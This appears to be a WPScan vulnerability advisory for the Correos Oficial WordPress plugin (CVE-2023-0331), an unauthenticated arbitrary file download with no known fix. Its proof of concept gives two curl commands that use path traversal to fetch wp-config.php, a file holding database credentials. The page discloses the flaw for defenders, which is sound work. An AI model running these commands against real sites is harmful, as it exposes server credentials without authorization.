WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Correos Oficial <= 1.3.0.0 - Unauthenticated Arbitrary File Download

Description

The plugin does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.

Proof of Concept

Dependency: WooCommerce plugin

Use the following curl command to download the contents of the wp-config.php file:

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=../../..&filename=wp-config.php' 

or

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=..&filename=/../../wp-config.php'

Affects Plugins

correosoficial
No known fix

References

CVE
CVE-2023-0331

Classification

Type

FILE DOWNLOAD

OWASP top 10
A1: Injection
CWE
CWE-552

Miscellaneous

Original Researcher

Andrea Iodice

Submitter

Andrea Iodice

Verified

Yes

WPVDB ID
1b4dbaf3-1364-4103-9a7b-b5a1355c685b

Timeline

Publicly Published

2023-01-31 (about 3 months ago)

Added

2023-01-31 (about 3 months ago)

Last Updated

2023-02-01 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin